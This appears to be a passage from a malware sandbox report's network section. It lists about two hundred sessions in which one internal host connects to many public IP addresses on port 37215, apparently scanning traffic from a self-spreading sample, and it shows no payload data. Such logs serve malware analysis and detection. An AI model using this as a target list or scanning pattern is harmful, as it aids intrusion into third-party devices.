                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18713192.168.2.1357290197.24.18.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18714192.168.2.1333246156.88.69.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18715192.168.2.1341334157.222.246.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18716192.168.2.1346292197.167.65.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18717192.168.2.135107641.54.49.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18718192.168.2.134482241.58.31.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18719192.168.2.135103269.15.171.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18720192.168.2.134760241.4.90.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18721192.168.2.133887441.138.126.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18722192.168.2.1334918128.149.35.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18723192.168.2.1339814107.42.209.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18724192.168.2.1335004197.86.176.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18725192.168.2.134536641.56.17.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18726192.168.2.134364041.223.27.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18727192.168.2.1341462197.140.85.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18728192.168.2.1343174167.33.233.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18729192.168.2.1338236197.15.189.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18730192.168.2.134487641.5.66.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18731192.168.2.1334372157.25.11.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18732192.168.2.135375219.148.46.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18733192.168.2.134239841.40.159.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18734192.168.2.135849641.253.203.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18735192.168.2.1335972197.19.45.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18736192.168.2.1342206157.242.32.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18737192.168.2.136058047.61.152.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18738192.168.2.134509841.195.83.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18739192.168.2.134112441.58.75.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18740192.168.2.1341920218.225.139.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18741192.168.2.134162441.97.96.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18742192.168.2.135945441.245.78.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18743192.168.2.1337712197.169.20.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18744192.168.2.1353766197.201.87.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18745192.168.2.1339508131.229.93.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18746192.168.2.1350832157.151.26.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18747192.168.2.1341236157.31.72.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18748192.168.2.134255241.4.127.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18749192.168.2.1352262197.42.202.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18750192.168.2.135445041.218.145.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18751192.168.2.1356306197.253.125.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18752192.168.2.1354720197.75.110.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18753192.168.2.1352690157.205.240.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18754192.168.2.1351434157.91.147.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18755192.168.2.1338230157.222.158.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18756192.168.2.134120039.48.28.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18757192.168.2.1348206157.250.230.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18758192.168.2.1359642116.94.170.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18759192.168.2.1352816157.6.41.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18760192.168.2.1336246157.245.164.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18761192.168.2.1337062168.252.128.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18762192.168.2.1359544157.143.147.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18763192.168.2.1343524157.196.185.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18764192.168.2.1337678105.14.201.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18765192.168.2.1353428197.72.183.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18766192.168.2.136067041.183.67.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18767192.168.2.1334266197.204.122.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18768192.168.2.1337090157.211.29.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18769192.168.2.134171041.30.124.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18770192.168.2.1346018157.159.215.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18771192.168.2.1333122157.191.233.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18772192.168.2.1340524197.255.47.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18773192.168.2.1345690197.44.25.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18774192.168.2.1349434197.68.156.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18775192.168.2.133895641.244.116.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18776192.168.2.134225041.152.146.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18777192.168.2.1343526197.117.58.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18778192.168.2.1348946157.239.24.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18779192.168.2.1341800100.243.80.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18780192.168.2.1340688157.158.72.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18781192.168.2.133688663.183.112.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18782192.168.2.135940841.16.85.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18783192.168.2.134930241.17.203.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18784192.168.2.1345208174.173.157.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18785192.168.2.1344558157.39.89.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18786192.168.2.1334208197.41.119.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18787192.168.2.1339352157.66.162.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18788192.168.2.134374241.172.72.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18789192.168.2.135313641.175.136.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18790192.168.2.1359804197.198.12.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18791192.168.2.135888441.239.38.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18792192.168.2.134055441.33.90.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18793192.168.2.1357750157.205.77.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18794192.168.2.134079471.124.254.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18795192.168.2.1346316197.177.253.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18796192.168.2.135958231.109.161.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18797192.168.2.1353964197.171.55.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18798192.168.2.1338942197.45.115.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18799192.168.2.1357274197.20.29.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18800192.168.2.134728435.242.1.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18801192.168.2.1346498118.33.147.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18802192.168.2.1360630197.181.7.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18803192.168.2.1345956197.152.12.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18804192.168.2.1346768205.161.240.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18805192.168.2.134778441.93.87.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18806192.168.2.135875641.56.95.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18807192.168.2.1346080157.63.26.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18808192.168.2.1352704202.32.67.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18809192.168.2.1354142157.195.241.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18810192.168.2.135573212.219.79.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18811192.168.2.134025041.160.215.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18812192.168.2.135383089.62.222.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18813192.168.2.1360148197.229.166.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18814192.168.2.135926441.224.191.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18815192.168.2.134696841.165.26.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18816192.168.2.135583851.252.78.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18817192.168.2.135111841.102.114.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18818192.168.2.1344450197.226.36.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18819192.168.2.133702641.112.134.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18820192.168.2.133285641.72.91.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18821192.168.2.1348924157.170.233.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18822192.168.2.1350962197.2.203.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18823192.168.2.1343368157.132.11.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18824192.168.2.1354628197.122.9.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18825192.168.2.1343508197.51.235.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18826192.168.2.133899841.83.167.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18827192.168.2.135639241.108.204.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18828192.168.2.133880041.115.40.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18829192.168.2.1344182157.78.165.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18830192.168.2.133638641.4.92.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18831192.168.2.135902841.79.224.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18832192.168.2.1346216157.204.203.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18833192.168.2.1348020157.189.43.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18834192.168.2.1339596157.43.8.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18835192.168.2.1339576117.19.108.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18836192.168.2.134025041.174.191.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18837192.168.2.1355648157.249.104.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18838192.168.2.1345950134.15.136.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18839192.168.2.1335690189.194.203.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18840192.168.2.1343076197.120.162.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18841192.168.2.1351830157.142.71.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18842192.168.2.133652027.237.31.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18843192.168.2.135295041.37.91.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18844192.168.2.133504253.32.65.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18845192.168.2.133700041.221.55.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18846192.168.2.1336052157.193.82.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18847192.168.2.1342904153.34.62.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18848192.168.2.134798279.134.239.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18849192.168.2.133969841.30.241.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18850192.168.2.134897041.216.180.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18851192.168.2.1348950117.92.17.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18852192.168.2.1350682157.25.18.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18853192.168.2.1353634164.152.245.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18854192.168.2.133536241.240.26.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18855192.168.2.1353358157.81.232.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18856192.168.2.134999041.153.110.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18857192.168.2.1342894197.50.0.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18858192.168.2.1333254197.27.10.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18859192.168.2.134638041.159.240.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18860192.168.2.1336020157.91.44.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18861192.168.2.1341850157.160.99.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18862192.168.2.133756041.174.56.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18863192.168.2.1343658114.45.244.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18864192.168.2.135414841.232.7.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18865192.168.2.1337896157.143.134.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18866192.168.2.133804641.186.159.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18867192.168.2.1351680158.231.129.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18868192.168.2.134257641.243.192.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18869192.168.2.134787041.141.71.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18870192.168.2.134021462.72.132.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18871192.168.2.13403649.24.52.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18872192.168.2.1351786197.236.211.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18873192.168.2.133708441.252.149.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18874192.168.2.1333246197.122.179.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18875192.168.2.1350716157.124.213.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18876192.168.2.134609241.211.239.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18877192.168.2.1343294157.161.124.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18878192.168.2.136070494.211.243.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18879192.168.2.134457441.79.233.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18880192.168.2.134148441.107.133.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18881192.168.2.1359152157.149.175.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18882192.168.2.1352164157.219.212.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18883192.168.2.1336812157.111.1.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18884192.168.2.133466041.118.221.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18885192.168.2.1354196197.2.144.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18886192.168.2.1348708157.128.197.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18887192.168.2.134418441.61.144.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18888192.168.2.134164441.49.59.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18889192.168.2.1354630157.48.92.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18890192.168.2.1358942197.113.170.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18891192.168.2.1334668157.221.11.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18892192.168.2.135405841.228.213.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18893192.168.2.1336056157.207.166.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18894192.168.2.1350322197.3.167.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18895192.168.2.1356230157.229.108.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18896192.168.2.134734041.240.185.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18897192.168.2.1352398197.195.91.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18898192.168.2.1342878157.150.222.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18899192.168.2.1355012157.226.122.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18900192.168.2.13392082.254.2.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18901192.168.2.135877291.47.83.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18902192.168.2.1359696157.238.8.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18903192.168.2.136086063.189.191.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18904192.168.2.1351626157.135.226.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18905192.168.2.1349262157.81.129.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18906192.168.2.1337962197.228.73.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18907192.168.2.133386441.243.190.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18908192.168.2.1340248157.253.200.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18909192.168.2.1341100197.237.172.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18910192.168.2.1341482157.151.102.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18911192.168.2.1349908185.126.197.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18912192.168.2.135410250.112.116.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18913192.168.2.1334692197.99.231.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18914192.168.2.134270241.203.90.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18915192.168.2.135541053.75.142.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18916192.168.2.1338568139.192.215.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18917192.168.2.1337460157.162.220.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18918192.168.2.134845291.0.141.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18919192.168.2.1343198197.79.35.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18920192.168.2.1337468104.208.199.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18921192.168.2.135492478.17.160.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
